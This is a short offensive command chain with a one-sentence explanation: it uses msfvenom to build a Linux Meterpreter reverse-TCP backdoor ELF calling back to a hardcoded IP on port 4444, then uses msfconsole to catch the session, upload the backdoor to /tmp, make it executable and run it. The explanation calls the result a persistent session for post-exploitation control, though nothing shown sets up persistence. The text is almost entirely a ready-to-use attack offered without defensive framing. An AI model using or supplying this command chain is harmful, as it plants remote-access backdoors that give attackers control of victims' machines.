msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=128.199.206.122 LPORT=4444 -f elf > backdoor.elf; \
msfconsole -x "use exploit/multi/handler; set payload linux/x64/meterpreter_reverse_tcp; \
set LHOST 128.199.206.122; set LPORT 4444; exploit -j; \
sessions -u 1; upload backdoor.elf /tmp/; chmod +x /tmp/backdoor.elf; \
execute -f /tmp/backdoor.elf -i; exit"
This command chain crafts a malicious ELF executable using msfvenom, sets up a Metasploit listener, then upon successful exploitation, uploads the backdoor to the target and executes it, establishing a persistent Meterpreter session for further control and post-exploitation activities.